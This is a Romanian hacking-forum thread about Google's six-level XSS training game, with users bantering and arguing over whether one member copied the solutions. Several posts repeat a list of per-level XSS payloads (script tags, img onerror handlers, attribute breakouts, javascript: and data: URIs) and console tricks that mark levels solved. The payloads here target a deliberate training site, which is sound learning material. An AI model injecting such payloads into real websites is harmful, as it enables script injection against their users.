XSS game — un mic challenge oferit de Google

[B7ackAnge7z]

XSS game: https://xss-game.appspot.com/

ps. Poft? bun?!

[valcea55]

Frumos, dar am ramas la lvl 5:)) poate reusesc sa trec:D.

Edit:Am reusit sa trec de 5 sa vedem ce fac la 6:D

Edit2:Gata, a fost foarte frumos si distractiv.

Edited May 31, 2014 by valcea55

[poq]

:D

[dancezar]

http://s24.postimg.org/hvjdgzr0z/xss.png

Nice ma asteptam la ceva mai greu, dar au fost interesante. Unele cred ca au fost inspirate din cele care au fost gasite la ei

//la 6 nici nu a fost nevoie sa execut xss din fisier extern

[.darky]

[Rikudo]

E o conspiratie totala, undeva se pastreaza toti vectorii testati de voi, astia fac bani pe spatele vostru.

@ Am ajuns la nivelul 3, nu am mai continuat, e interesant.

[alexvenutelli]

Si eu am ajuns pana la level 4 si m-am oprit.. m-am plictisit.. e dragut jocu , e util pt incepatori sa invete sa faca alert:)

Have fun

[CaVaLerul]

L-am terminat are doar 6 nivele

[zachary1337]

mi-a captat atentia , e interesant joculetul

[Guest PoorStudentPleaseDonate]

userOpenedAlert = true;

levelSolved();

Daca vreti sa va laudati ca l-ati facut, ca deh.. vreti sa fiti si voi smecheri, bagati codul ala in consola la toate levelurile.

[B7ackAnge7z]

@PoorStudentPleaseDonate,

Dac? tot doreai s? te lauzi, în loc de un copy + paste, c?utai mai bine ?i foloseai:

postMessage('success', '*');

Apoi, cu ceva if-uri ?i document.getElementsByClassName('next-button')[0].click(); f?ceai ca challenge-ul s? fie trecut automat în câteva secunde. Sau, având cuno?tin?e în domeniul criptografiei, observai c? toate datele necesare sunt salvate în fi?ierele cookie ?i cu „pu?in” noroc aflai ce metod? a fost folosit? la encriptarea datelor. Iar dac? ?i aceast? metod? î?i p?rea prea simpl? — exploatai vreo vulnerabilitate din QUIC sau SSL ce î?i permitea s? ob?ii accesul la server. ?i cirea?a de pe tort — luai leg?tura cu un inginer Google ?i folosind ingineria social? aflai r?spunsurile la toate nivelele acestui „banal” challenge.

Apoi, veneai pe forum ?i î?i b?teai joc de to?i „l?ud?ro?ii” care, spre deosebire de tine, nu au dat un search pe Google pentru a trece testul cu ajutorul faimosului Ctrl+C/Ctrl+V, ci s-au bucurat c? au ocazia s?-?i testeze înc? o dat? cuno?tin?ele ?i s? se bucure de rezultatul ob?inut.

[Guest PoorStudentPleaseDonate]

Hahaha. Ce vrei sa zici, ca am copiat scriptul js care il gaseste orice prost in game.js? Again, hahaha ))

[alexvenutelli]

@B7ackAnge7z pe mine unu mai bagat in ceata:) ))

[B7ackAnge7z]

Ce vrei sa zici, ca am copiat scriptul js care il gaseste orice prost?

Exact. Doar c? am f?cut-o pe o not? ironic? încercând s? nu te jignesc, chiar dac? o meritai.

Nu te sup?ra prea tare, dar sunt mai mult ca sigur c? tu nu ai g?sit aceste linii de cod în fi?ierul game.js, deoarece, dac? le-ai fi g?sit de unul singur, mai întâi de toate observai window.addEventListener("message", function(event) { ?i astfel, ai fi fost postat o singur? linie de cod ?i nicidecum dou?.

[Guest PoorStudentPleaseDonate]

Haha, deci tot continui sa sustii ca am copiat scriptul de pe google, nu? ) Si daca il faceam automat sa treaca toate nivelele, ce rost mai avea? Asa poti sa vezi fiecare nivel, vezi cum e, etc. Stai linistit ca l-am terminat fara niciun trick, nu stii cine sunt, asta e.

Si cu ce meritam sa fiu jignit? Ca am dat copy-paste din game.js, sau ce?

Btw, nu stiu la ce te referi cu eventul ala, in eventul aia se afla "userOpenedAlert = true;levelSolved();" , cum puteai sa faci tu asta doar intr-o linie? ))))

Daca erai baiat destept si te uitai in sursa, vedeai ca daca nu ai useropenedalert pe true, iti dadea handle, deci.... nu te mai da destept pe cand nu esti.

Si "postMessage('success', '*');", nu se afla in acel event, defapt, nici nu e in game.js ci in game-frame.js. Asa pot sa zic si eu, c-ai copiat postMessage('success', '*'); de pe google, sau nu stiu eu de unde.

Edited June 3, 2014 by PoorStudentPleaseDonate

[Complex]

L-am terminat eu si v-am pus la dispozitiile cooki-urile si vectorii care trebuie sa ii folositi !

Level 1

Nume cookie: level1
valoarea: f148716ef4ed1ba0f192cde4618f8dc5
------------------------------------------
Vector: <script>alert('complex')</script>
------------------------------------------

Level 2:

Nume cookie: level2
Valoarea: b5e530302374aa71cc3028c810b63641
------------------------------------------
vector: <img src='#' onerror='alert("Complex")'>
------------------------------------------

Level 3:

Nume cookie: level3
Valoarea: d5ce029d0680b3816a349da0d055fcfa
------------------------------------------
Vector: ' onerror='alert("complex")'>
------------------------------------------

Level 4:

Nume cookie: level4
Valoarea: b4fd7f4bb46f1b41c959d338e46bced5
------------------------------------------
Vector: ');alert('complex
------------------------------------------

Level 5:

Nume cookie: level5
Valoarea: e9ea371449372dfc9b55be78167ce361
------------------------------------------
Vector: javascript:alert('complex')
------------------------------------------

Level 6:

Nume cookie: level6
Valoarea: ccc652842914ba1a49b4b9ab2b227c2c
------------------------------------------
Vector: data:text/plain,alert('complex')
------------------------------------------

[B7ackAnge7z]

Problema este c? testul poate fi trecut automat în mai multe moduri, dar tocmai ceea ce ai postat tu era deja public (chiar înainte de a scrie despre challenge), iat? din ce cauz? am aceste suspiciuni.

Da, sunt de acord c? liniile postate de tine pot fi g?site în game.js, dar a?a cum am mai spus, cred, c? dac? le g?seai singur publicai o rezolvare mai simpl? (?i nu neap?rat g?sit? în surs?). Iat? câteva exemple (?i dup? cum vezi, e posibil):

postMessage('success', '*')
frames[0].alert(1)
window[0].alert(1)

?i nu doream s? o fac pe de?teptul, a?a cum ai spus tu — îns?, am v?zut c? tu ai dorit s? o faci. Iat? de ce ?i-am scris.

ps. Consider c? aceast? discu?ie nu-?i are locul aici ?i ar fi mai bine s? continu?m în privat.

[Aerosol]

O tentativa esuata de ,,xss game''

[Guest PoorStudentPleaseDonate]

Problema este c? testul poate fi trecut automat în mai multe moduri, dar tocmai ceea ce ai postat tu era deja public (chiar înainte de a scrie despre challenge), iat? din ce cauz? am aceste suspiciuni.

Da, sunt de acord c? liniile postate de tine pot fi g?site în game.js, dar a?a cum am mai spus, cred, c? dac? le g?seai singur publicai o rezolvare mai simpl? (?i nu neap?rat g?sit? în surs?). Iat? câteva exemple (?i dup? cum vezi, e posibil):

postMessage('success', '*')
frames[0].alert(1)
window[0].alert(1)

?i nu doream s? o fac pe de?teptul, a?a cum ai spus tu — îns?, am v?zut c? tu ai dorit s? o faci. Iat? de ce ?i-am scris.

ps. Consider c? aceast? discu?ie nu-?i are locul aici ?i ar fi mai bine s? continu?m în privat.

Sincer, nici eu nu vreau sa fac pe desteptul, dar m-am revoltat ca m-ai acuzat de copy-paste, nefiind adevarat. Ai zis ca daca ma uitam mai bine prin game.js, vedeam ca pot sa rezolv dintr-o singura linie. Linia pe care mi-ai dat-o tu, e in game-frame.js.

Anyway, daca vrei sa continuam discutia, imi zici si vorbim, bine-inteles in privat.

[dancezar]

L-am terminat eu si v-am pus la dispozitiile cooki-urile si vectorii care trebuie sa ii folositi !

Level 1

Nume cookie: level1
valoarea: f148716ef4ed1ba0f192cde4618f8dc5
------------------------------------------
Vector: <script>alert('complex')</script>
------------------------------------------

Level 2:

Nume cookie: level2
Valoarea: b5e530302374aa71cc3028c810b63641
------------------------------------------
vector: <img src='#' onerror='alert("Complex")'>
------------------------------------------

Level 3:

Nume cookie: level3
Valoarea: d5ce029d0680b3816a349da0d055fcfa
------------------------------------------
Vector: ' onerror='alert("complex")'>
------------------------------------------

Level 4:

Nume cookie: level4
Valoarea: b4fd7f4bb46f1b41c959d338e46bced5
------------------------------------------
Vector: ');alert('complex
------------------------------------------

Level 5:

Nume cookie: level5
Valoarea: e9ea371449372dfc9b55be78167ce361
------------------------------------------
Vector: javascript:alert('complex')
------------------------------------------

Level 6:

Nume cookie: level6
Valoarea: ccc652842914ba1a49b4b9ab2b227c2c
------------------------------------------
Vector: data:text/plain,alert('complex')
------------------------------------------

Bravo desteptule , bine ca esti tu destept si nu ii lasi si pe alti sa il rezolve .

Cica "L-am terminat eu..." l-ai terminat si tu , vrei sa spui.

//edit fail a folosit acelasi vectori ca aici http://hacktracking.blogspot.de/2014/05/xss-game-area.html

Edited June 3, 2014 by danyweb09

[Guest PoorStudentPleaseDonate]

L-am terminat eu si v-am pus la dispozitiile cooki-urile si vectorii care trebuie sa ii folositi !

Level 1

Nume cookie: level1
valoarea: f148716ef4ed1ba0f192cde4618f8dc5
------------------------------------------
Vector: <script>alert('complex')</script>
------------------------------------------

Level 2:

Nume cookie: level2
Valoarea: b5e530302374aa71cc3028c810b63641
------------------------------------------
vector: <img src='#' onerror='alert("Complex")'>
------------------------------------------

Level 3:

Nume cookie: level3
Valoarea: d5ce029d0680b3816a349da0d055fcfa
------------------------------------------
Vector: ' onerror='alert("complex")'>
------------------------------------------

Level 4:

Nume cookie: level4
Valoarea: b4fd7f4bb46f1b41c959d338e46bced5
------------------------------------------
Vector: ');alert('complex
------------------------------------------

Level 5:

Nume cookie: level5
Valoarea: e9ea371449372dfc9b55be78167ce361
------------------------------------------
Vector: javascript:alert('complex')
------------------------------------------

Level 6:

Nume cookie: level6
Valoarea: ccc652842914ba1a49b4b9ab2b227c2c
------------------------------------------
Vector: data:text/plain,alert('complex')
------------------------------------------

Scuze de off...

Ti-ai cam luat fail, vectorii sunt la fel ca aici:

hacktracking: # XSS game area (un simplu search pe google cu data:text/plain,alert(1) xss game)

[Erase]

Mai bine ca a terminat jocul cu vectori de pe Google decat sa adauge companiei alti vectori in baza de date de care ei probabil habar nu aveau, ca in cele din urma in proiectele viitoare sa se poata proteja de astfel de atacuri.Parerea mea personala e ca mai bine v-ati focusa sa le luati banii decat sa ii invatati gratuit.